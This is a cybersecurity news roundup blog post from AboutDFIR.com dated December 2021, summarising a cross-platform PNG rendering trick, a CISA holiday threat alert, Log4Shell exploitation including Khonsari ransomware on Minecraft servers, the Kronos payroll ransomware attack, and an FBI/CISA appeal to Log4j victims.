AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 12/17/2021

This image looks very different on Apple devices — see for yourself

Take a good look at the image below and the device you are on. Now view it again on an Apple device. Conversely, if you are using an Apple device, view this page on an Android or Windows device. If you are using an Apple device and viewing this page on Safari, chances are the image appears quite differently from what you’d see on, for example, Chrome or an imaging app on Windows. Reverse engineer and cryptographer David Buchanan might have left us all puzzled with his latest creation. The PNG above reads ‘HELLO WORLD’ for most users—except those who see ‘HELLO APPLE,’ that is, in Apple-made software. But, believe us, it is the same image a.png, interpreted differently by Apple and non-Apple applications.


CISA: Prepare Now for Holiday Cyber Onslaught

Critical infrastructure (CNI) providers must act now to protect their IT systems from attacks during the holiday season, the US government has warned. The Cybersecurity and Infrastructure Security Agency (CISA) issued a new alert demanding a more proactive stance “in light of persistent and ongoing cyber-threats.” It urged organizations to ensure they have sufficient staff to monitor IT and OT systems over the holidays continuously and that they stay informed of the latest threats by signing up to CISA mailing lists and feeds. The agency also urged network defenders to follow industry best practices such as enforcing multi-factor authentication and strong passwords and installing software updates. CNI firms should also test their incident response processes and cross-sector dependencies and report any incidents and “anomalous activity” immediately to CISA, it said.


Microsoft: Khonsari ransomware hits self-hosted Minecraft servers

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability. Mojang Studios, the Swedish video game developer behind Minecraft, released an emergency security update last week to address the bug tracked as CVE-2021-44228 in the Apache Log4j Java logging library(used by the game’s Java Edition client and multiplayer servers). While there was no mention of attacks targeting Minecraft servers using Log4Shell exploits at the time, Redmond’s security experts updated their CVE-2021-44228 guidance today to warn of ongoing exploitation to deliver ransomware on non-Microsoft hosted Minecraft servers. “In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,” Microsoft said.


Ransomware attack threatens paychecks just before Christmas

A major payroll company has been crippled by ransomware hackers, leaving some companies around the country scrambling to cover employees’ last paychecks before Christmas and many workers wondering if they’ll get paid on time. Kronos, one of the largest workforce management companies in the U.S., was hit with ransomware Saturday, according to the company’s public updates page, and announced Monday that its programs that rely on cloud services — which a number of companies use to pay employees and manage their hours — would be unavailable for “several weeks.” For many Americans who are paid biweekly, Dec. 17 is the final payday before Christmas.


‘Insane’ spread of Log4j exploits won’t abate anytime soon

The high-profile Log4j security vulnerability known as Log4Shell is attracting attacks at a rate that is astounding even veteran infosec professionals. Nadir Izrael, chief technology officer for IoT security firm Armis, said that just a few days after its initial disclosure, the bug, designated as CVE-2021-44228, is being subjected to an alarmingly high level of exploit activity. “Compared to others, this is kind of insane,” Izrael told SearchSecurity. “The speed with which it started getting exploited, and the volume and magnitude, is insane.” Izrael estimated that more than a third of Armis’ security clients have had internet-facing systems targeted by exploit scripts that seek to use the remote code execution flaw to place malware. Other security vendors and researchers have noted similar patterns, with attackers looking to run anything from cryptomining scripts to remote access and command payloads.


Seeking Victims of Log4j Vulnerability

The FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) are working jointly in response to the ongoing threat associated with the Log4j CVE. If you believe that malicious cyber actors have exploited this vulnerability on your network, please submit a complaint to the Internet Crime Complaint Center (IC3). Your responses are voluntary but would be useful in identifying you as a potential victim. Based on the responses provided, you may be contacted by the FBI and/or CISA and asked to provide additional information.

Related Posts